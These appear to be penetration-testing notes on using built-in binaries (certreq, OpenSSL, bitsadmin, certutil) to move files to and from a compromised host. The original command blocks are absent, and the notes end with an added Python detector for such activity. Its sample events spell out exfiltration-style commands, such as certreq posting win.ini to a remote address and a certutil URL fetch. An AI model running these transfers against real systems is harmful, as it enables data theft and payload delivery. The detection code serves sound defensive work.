☑️Living Off The Land
There are currently two websites that aggregate information related to LOLBins (Living Off The Land Binaries):
LOLBAS
To search LOLBAS for the download and upload functions, we can use /download or /upload:

Let's use CertReq.exe as an example.
We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.
So we start a listener first:
Then we upload win.ini to our attack machine:
GTFOBins
To search GTFOBins for the download and upload functions of Linux binaries, we can use +file download or +file upload.

Let's use OpenSSL. It's frequently installed and often included in other software distributions, with sysadmins using it to generate security certificates, among other tasks. OpenSSL can be used to send files "nc style."
We need to create a certificate and start a server on our attack machine.
Now we stand up the server on our attack machine:
Next, with the server running we need to download the file from the compromised machine:
Other Common LOL Tools
Bitsadmin Download function
The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work.
Downloading a file using Bitsadmin:
Certutil
Casey Smith (@subTee) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a de facto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
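Because all four tools covered on this page are legitimate binaries, defenders catch their file-transfer use by the command line rather than by the file on disk. The following is an added example, not part of the original notes: a small classifier over process-creation events that flags the transfer switches of certreq, bitsadmin, certutil and openssl. The event field names `image` and `command_line`, the rule set and the sample events are assumptions constructed for illustration.

```python
import re

# Transfer-capable switches per binary (name lower-cased, ".exe" removed).
RULES = {
    "certreq": (re.compile(r"(?i)(?:^|\s)[-/]post(?=\s|$)"), "certreq HTTP POST"),
    "bitsadmin": (re.compile(r"(?i)(?:^|\s)/(?:transfer|addfile)(?=\s|$)"), "BITS transfer job"),
    "certutil": (re.compile(r"(?i)(?:^|\s)[-/](?:urlcache|verifyctl)(?=\s|$)"), "certutil URL fetch"),
    "openssl": (re.compile(r"(?i)(?:^|\s)s_(?:client|server)(?=\s|$)"), "openssl raw TLS channel"),
}
# Remote endpoint: URL, UNC path, or the host:port that follows -connect.
REMOTE = re.compile(r"(?i)https?://[^\s\"']+|\\\\[^\s\"']+|(?<=-connect\s)\S+")


def binary_name(image):
    """Basename of a Windows or POSIX image path, lower-cased, '.exe' removed."""
    name = re.split(r"[\\/]", image.strip('"'))[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(event):
    """Return (label, remote) for a transfer-style invocation, else None."""
    rule = RULES.get(binary_name(event["image"]))
    if rule is None:
        return None
    pattern, label = rule
    args = event["command_line"]
    if not pattern.search(args):
        return None  # e.g. certutil -hashfile: same binary, no transfer
    remote = REMOTE.search(args)
    return label, remote.group(0) if remote else None


def scan(events):
    """List of (binary, label, remote) for every flagged event."""
    return [(binary_name(e["image"]), *hit) for e in events if (hit := classify(e))]


# Constructed sample events; 192.0.2.0/24 is a documentation address range.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certreq.exe", "command_line": r"certreq.exe -Post -config http://192.0.2.10:8000/ C:\Windows\win.ini"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "command_line": r"bitsadmin /transfer job1 http://192.0.2.10/file.bin C:\Users\Public\file.bin"},
    {"image": r"C:\Windows\System32\CertUtil.exe", "command_line": "CertUtil.exe /URLCACHE /f http://192.0.2.10/a.txt a.txt"},
    {"image": "/usr/bin/openssl", "command_line": "openssl s_client -connect 192.0.2.10:443 -quiet"},
    {"image": r"C:\Windows\System32\certutil.exe", "command_line": r"certutil.exe -hashfile C:\Temp\a.txt SHA256"},
]

if __name__ == "__main__":
    for row in scan(SAMPLE_EVENTS):
        print(row)
```

Matching on the image name alone misses renamed copies of these binaries, so in practice the same switch patterns are also applied to the original file name recorded by the logging source.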